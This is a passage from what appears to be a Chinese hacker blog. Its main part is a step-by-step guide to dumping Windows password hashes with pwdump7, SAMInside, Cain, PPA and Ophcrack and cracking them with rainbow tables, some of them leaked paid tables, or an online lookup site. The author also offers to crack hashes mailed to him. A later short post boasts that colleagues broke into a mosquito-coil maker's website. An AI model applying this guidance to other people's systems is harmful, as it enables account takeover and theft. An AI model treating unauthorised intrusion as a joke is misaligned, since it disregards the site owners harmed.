先来试下2000/XP/2003下的那些工具，测试系统版本：Windows Server Enterprise SP1（企业版），已更新所有补丁程序。pwdump7.exe可以运行，但是抓出来的hash明显与之前的不同，LM-hash那段都是星号，原因就是前面说过的Windows 2008禁用了LM-hash，如图16。

GetHashes.exe没有成功抓到hash，生成的txt文件为空白，如图17。

SAMInside也可以运行，成功抓取到了hash，不过LM-hash段全为0，要注意使用最新版本，如图18。

再来看看LC5，安装运行，N久后提示“Couldn't impersonate system account.You do not have the privileges to perform this operation.”确定之后继续提示“Error importing passwords from the registry.You may have insufficient permissions to perform this action.”大致意思是说我没有权限执行这个操作，可是我是以管理员身份运行的LC5的，它自己不行所以就很委婉地推托说是我权限不够。不过LC5的公司已经被人收购了N久，版本也没有再更新，在新的Windows 2008下表现令人失望也情有可愿，如图19、图20。

而且拿pwdump7.exe和SAMInside抓取的hash导入LC5也同样无法破解，一点小三角形开始按钮便马上停止。这一轮，LC5被淘汰。

接下来轮到Cain了，轻松抓取，不过Windows 2008的密码默认不允许使用简单密码，所以给密码破解提高了难度，细心的朋友可能会发现，LM-hash段显示的并不是SAMInside的一串0，而是清一色的AAD3B435B51404EEAAD3B435B51404EE，具体原因聪明的朋友自己分析下为什么，呵呵，如图21。

这里要提的一点是Cain抓的hash格式和别的工具抓的不太一样，需要自己处理下才能导入破解，要不然别的工具直接导入的话，会无法识别。示例如下：

SAMInside：
Administrator:500:NO PASSWORD*********************:03937006E74E63318B23D01A6E29A4FB:::

Cain：
Administrator:"":"":AAD3B435B51404EEAAD3B435B51404EE:03937006E74E63318B23D01A6E29A4FB
为了加强通用性，在此提醒大家hash格式统一以第一种为准，也就是SAMInside所抓取的那个格式！

ppa

下面轮到Proactive Password Auditor（以下简称ppa），这是一个商业软件（就是要钱的那种），不过官方提供60天试用版本，功能无限制，低版本有破解版。该软件需要安装，界面如图22。

如果你要抓取Windows 2008的本机hash，那直接点击Dump即可抓取，默认是从“Memory of local computer”本地计算机内存抓取。该软件还支持注册表抓取，SAM文件抓取，同时支持远程抓取hash，轻松抓到hash，如图23。

也支持导入hash破解，同时还支持暴力破解、字典破解、彩虹表破解。这里着重介绍下彩虹表破解。首先要明白，彩虹表是什么东西呢？

小知识：什么是彩虹表？

彩虹表就是一个庞大的、针对各种可能的字符组合预先计算好的哈希值的集合，不一定是针对MD5算法的，各种算法的都有，有了它可以快速的破解各类密码。越是复杂的密码，需要的彩虹表就越大，现在主流的彩虹表都是100G以上。

要用ppa配合彩虹表破解的方法也比较简单，Attack选择“Rainbow”->“NTLM attack”->“Rainbow tables list...”->“Add”选择导入彩虹表文件，格式一般为*.rt，我下载了国外一个免费的彩虹表，目前大小为207GB，完整表还会更大。导入所有彩虹表后，点击“Recovery”->“Start recovery”开始破解，如图24、图25。

这个软件个人感觉跑纯数学密码超级快，即使是14位长的纯数字密码，也用不了几秒钟！ppa支持Vista和2008下破解。

Ophcrack

下面该轮到本文最有价值的软件——Ophcrack出场了！Ophcrack是一个免费的在配合彩虹表的基础上破解Windows系统密码的工具。效率相当可观，它配备了一个Windows下的图形用户界面并且支持多平台运行。而且还可以下载官方的Ophcrack LiveCD刻录成光盘，就可以走到哪破到哪了！其官方网站为http://Ophcrack.sourceforge.net/，可以到官方下载安装，如图26。

Ophcrack所用的彩虹表和常规的彩虹表不太一样，它识别不了*.rt格式的彩虹表，只认官方的彩虹表。常规的彩虹表无法破解Vista、Windows 7、Windows 2008的密码hash。免费的彩虹表官方只提供三个：XP free small (380MB)、XP free fast (703MB)、Vista free (461MB)，其它更为强大的一些彩虹表则需要收取一定费用。安装的时候需要注意，可以选择是否下载官方彩虹表，如果你想安装好软件后另外自己下载则去掉勾选的选项即可，如图27。

安装完毕，界面比较清爽吧，如图28。

因为官方收费的一些表被国外的一些网站公布了，所以我下了两个比较常用的表：一个是XP special (7.5GB)；另一个是Vista special (8.0GB)，官方标价为99美元/个。至于更大的表则没有下载，其实有这两个表基本上都够用的了。别看它表体积不大，但威力不容小觑。似乎是做过某种优化和压缩，打开Ophcrack，“Load”->“Local SAM”，然后一个黑窗口闪过（其实到Ophcrack的安装目录就可以发现，它其实是用pwdump6来抓取hash的，不过pwdump6相对pwdump7来说比较稳定）成功抓取hash，图是在Windows 2003下操作的，因为Ophcrack用的是pwdump6，无法在Windows 2008及Vista下抓取hash（可以考虑替换pwdump6为pwdump7来改善这一功能，不过我没有成功，技术有限啊-_-），如图29、图30。

Tables标签下可以看到已安装的彩虹表，如果安装软件的时候没有下载官方彩虹表，后期下载完彩虹表后可以在Tables里进行安装，如图31。

然后就可以按Crack进行破解了。虽然说Ophcrack抓取hash的能力有所不足，相对在Vista下而言，但是我们可以用其他的hash抓取工具获得hash后再导入破解。来看看Ophcrack的破解成果图吧，密码14位，如图32。

需要注意的是，Vista下抓取的hash需要用Vista的彩虹表来破解，否则会破解失败！不过据说BitLocker加密也被国外黑客破解了，不过找不到相关资料，所以不再深入讨论，有兴趣的朋友可以自己测试。

在线查询

如果你觉得上面提到的这么多东西都太麻烦，有没有在线查询hash的网站呢？答案是肯定的！国外有一个在线查询hash的网站：http://www.objectif-securite.ch/en/products.php，和Ophcrack的官方有点关系的哦，嘿嘿……不过在线查询只允许查tables XP free的表，有点可惜……同时特别要指出的是，在线查询的时候需要注意hash的格式。比如用户名和密码都是hackest的hash为：
hackest:1011:7831A0FFABEE5FB3AAD3B435B51404EE:D78DF6E868E606E442313C5DF93216F1:::
我们只需要把7831A0FFABEE5FB3AAD3B435B51404EE:D78DF6E868E606E442313C5DF93216F1复制填入hash后面的框，再点击submit hash即可进行查询，同时也支持输入密码返回hash值，如图33。

Vista如果开启BitLocker则以上方法均无效，根本无法抓取到hash，不过好在BitLocker默认是关闭的，不是特别需要的用户一般不会开启它。

后记

当然了，破解至关重要的主hash的正确性，限制是密码的长度是否超过14位，还有密码所组成的字符集，甚至是中文的密码就无法破解。为什么密码长度超过14位也无法破解呢，因为NTLM-hash只支持到14位，目前还没有突破的方法。只要你认真阅读过本文，我相信你已经能破解绝大部分的Windows系统密码hash了，当然如果管理员用了组策略限制某个用户的密码有限期限为24小时，而第二天又自动启用另一个随机的密码，那破解密码就完全没有意义了（曾在美国某服务器遇到过这种变态级的管理员）。Windows下的密码就差不多说完了，那Linux下的系统密码又如何破解呢？其实更加简单（曾经在Ubuntu8.10下用john秒杀了我自己的密码），不过不在本文讨论范围之内，希望有兴趣的朋友自己去尝试。可能这篇文章会让不少朋友头疼，因为这里面介绍的软件没有一个是中文的！这说明了什么问题呢？国内与国外的技术还是有一个实际性的差距！其实有些软件也有汉化版，为什么不选用呢？汉化版大多数不干净，而且如果你是一个自强的技术人员的话，不可以连一点点英文都不会，如果你对英文软件感觉头疼，呵呵，还需要加强英语水平哦（虽然我自己的英语水平都很烂-_-别说我崇洋媚外啊，好东西就是要学习嘛）。不需要你英语多少级，但最起码你得明白软件上写的是什么意思，能读懂部份英文技术文档，从中获取自己所需要的技术细节，从而达到加强自身的目的！本文仅作技术交流，切勿用于非法用途，否则后果自负，如果你没有条件破解，也可以把hash邮件发我邮箱（436270@qq.com），可以免费代为破解^-^。
（文章中涉及到的工具PwDump7.exe、GetHashes.exe、aio.exe、SAMInside.exe、LC5、Cain、Ophcrack、Proactive Password Auditor、Ophcrack XP Special Tables.torrent、Ophcrack Vista Special NTHASH Table.torrent、函数C代码已经收录在光盘中）
Tags - windows , 系统密码 , 破解

论装逼

Sun, 24 May 2009 12:31:01 +0000

题目：论装逼
作者：hackest [H.S.T.]
来源：hackest's blog

1、装逼之人必有牛逼之处，正如可怜之人必有可恨之处。

2、如果你第一波装的很成功的话，以后的就很自然了。
即使不装，他们也会自然而然的认为你的确很牛逼。

3、遇见装逼者，你必须装的比他们更牛逼，遇强愈强。
骗了一个人，你是骗子；
骗了一个地方的人，你是成功人士；
骗了一个国家，你就是领袖；
骗了整个世界，你就是上帝！

4、装逼是不会被雷劈的，因为到处都有避雷针。
Tags - 论装逼

惊现山寨版黑客专用蚊香

Thu, 14 May 2009 10:25:41 +0000

题目：惊现山寨版黑客专用蚊香
作者：hackest [H.S.T.]
来源：hackest's blog

今天媳妇去超市买了盒电蚊香，我一看傻了眼……如图……绝非PS！
怀疑是PS的可以去这个蚊香的官方网站看看……
http://www.cnlanjian.com/
经过同事的努力，终于手爆了丫的……
http://www.cnlanjian.com/productimg/2009514223723.asp
嗯，路过了……主页就不和谐它了，人家只是做蚊香的，看来不是hacker呀……
这样的生活比较有意思……

Tags - 黑客专用蚊香